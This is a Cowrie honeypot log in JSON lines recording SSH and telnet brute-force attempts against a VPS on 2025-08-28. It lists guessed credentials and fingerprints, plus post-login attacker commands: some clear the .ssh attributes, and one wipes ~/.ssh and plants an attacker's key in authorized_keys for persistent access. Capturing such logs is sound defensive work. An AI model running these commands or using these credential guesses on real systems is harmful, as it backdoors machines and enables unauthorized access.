{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:40:33.683102Z","src_ip":"212.227.125.160","session":"bb37b6d16547"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password","message":"login attempt [guest/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:40:34.544430Z","src_ip":"212.227.125.160","session":"bb37b6d16547"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:40:35.730036Z","src_ip":"212.227.125.160","session":"bb37b6d16547"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38298,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dfbc09fa01c","protocol":"ssh","message":"New connection: 212.227.125.160:38298 (1.2.3.4:22) [session: 9dfbc09fa01c]","sensor":"my-vps","timestamp":"2025-08-28T11:41:14.530019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:41:14.531746Z","src_ip":"212.227.125.160","session":"9dfbc09fa01c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:41:14.816390Z","src_ip":"212.227.125.160","session":"9dfbc09fa01c"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456789","message":"login attempt [guest/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:41:15.316355Z","src_ip":"212.227.125.160","session":"9dfbc09fa01c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:41:16.519757Z","src_ip":"212.227.125.160","session":"9dfbc09fa01c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41018,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5c99a69a89d","protocol":"ssh","message":"New connection: 212.227.125.160:41018 (1.2.3.4:22) [session: a5c99a69a89d]","sensor":"my-vps","timestamp":"2025-08-28T11:41:55.124483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:41:55.180006Z","src_ip":"212.227.125.160","session":"a5c99a69a89d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:41:55.293168Z","src_ip":"212.227.125.160","session":"a5c99a69a89d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345","message":"login attempt [guest/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:41:55.980075Z","src_ip":"212.227.125.160","session":"a5c99a69a89d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:41:57.151662Z","src_ip":"212.227.125.160","session":"a5c99a69a89d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48880,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e32206d8a9a","protocol":"ssh","message":"New connection: 212.227.235.229:48880 (1.2.3.4:22) [session: 2e32206d8a9a]","sensor":"my-vps","timestamp":"2025-08-28T11:42:26.248680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T11:42:26.261662Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T11:42:26.521784Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.login.success","username":"root","password":"123456aS","message":"login attempt [root/123456aS] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:42:30.916685Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:42:31.927090Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:42:31.927778Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:42:31.928872Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:32.489470Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:42:32.779154Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:42:32.779860Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:42:33.766530Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:33.767585Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50623,"dst_ip":"1.2.3.4","dst_port":22,"session":"e87c07c35bf6","protocol":"ssh","message":"New connection: 212.227.235.229:50623 (1.2.3.4:22) [session: e87c07c35bf6]","sensor":"my-vps","timestamp":"2025-08-28T11:42:34.028247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T11:42:35.629654Z","src_ip":"212.227.235.229","session":"e87c07c35bf6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T11:42:35.890910Z","src_ip":"212.227.235.229","session":"e87c07c35bf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48410,"dst_ip":"1.2.3.4","dst_port":22,"session":"21de02b5fae9","protocol":"ssh","message":"New connection: 212.227.125.160:48410 (1.2.3.4:22) [session: 21de02b5fae9]","sensor":"my-vps","timestamp":"2025-08-28T11:42:36.975424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:42:36.976241Z","src_ip":"212.227.125.160","session":"21de02b5fae9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:42:37.138817Z","src_ip":"212.227.125.160","session":"21de02b5fae9"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345678","message":"login attempt [guest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:42:37.632090Z","src_ip":"212.227.125.160","session":"21de02b5fae9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:38.798776Z","src_ip":"212.227.125.160","session":"21de02b5fae9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:42:43.722980Z","src_ip":"212.227.235.229","session":"e87c07c35bf6"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:45.038607Z","src_ip":"212.227.235.229","session":"e87c07c35bf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52996,"dst_ip":"1.2.3.4","dst_port":22,"session":"0469dfa1c96d","protocol":"ssh","message":"New connection: 212.227.235.229:52996 (1.2.3.4:22) [session: 0469dfa1c96d]","sensor":"my-vps","timestamp":"2025-08-28T11:42:45.299199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T11:42:45.323686Z","src_ip":"212.227.235.229","session":"0469dfa1c96d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T11:42:45.584015Z","src_ip":"212.227.235.229","session":"0469dfa1c96d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:46.730100Z","src_ip":"212.227.125.160","session":"88421f0f03b5"}
{"eventid":"cowrie.session.closed","duration":180.10444235801697,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:46.733404Z","src_ip":"212.227.125.160","session":"88421f0f03b5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:42:48.464510Z","src_ip":"212.227.235.229","session":"0469dfa1c96d"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:48.729000Z","src_ip":"212.227.235.229","session":"0469dfa1c96d"}
{"eventid":"cowrie.session.closed","duration":"22.5","message":"Connection lost after 22.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:42:48.729963Z","src_ip":"212.227.235.229","session":"2e32206d8a9a"}
{"eventid":"cowrie.session.connect","src_ip":"12.156.67.18","src_port":52578,"dst_ip":"1.2.3.4","dst_port":22,"session":"da8ae0167448","protocol":"ssh","message":"New connection: 12.156.67.18:52578 (1.2.3.4:22) [session: da8ae0167448]","sensor":"my-vps","timestamp":"2025-08-28T11:43:16.408503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:43:16.409408Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:43:16.565612Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57578,"dst_ip":"1.2.3.4","dst_port":23,"session":"d33d0754639e","protocol":"telnet","message":"New connection: 212.227.125.160:57578 (1.2.3.4:23) [session: d33d0754639e]","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.190482Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass","message":"login attempt [root/Pass] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.232510Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:43:17.566059Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.566810Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.568250Z","src_ip":"12.156.67.18","session":"da8ae0167448"}
{"eventid":"cowrie.login.failed","username":"tech","password":"tech","message":"login attempt [tech/tech] failed","sensor":"my-vps","timestamp":"2025-08-28T11:43:17.604446Z","src_ip":"212.227.125.160","session":"d33d0754639e"}
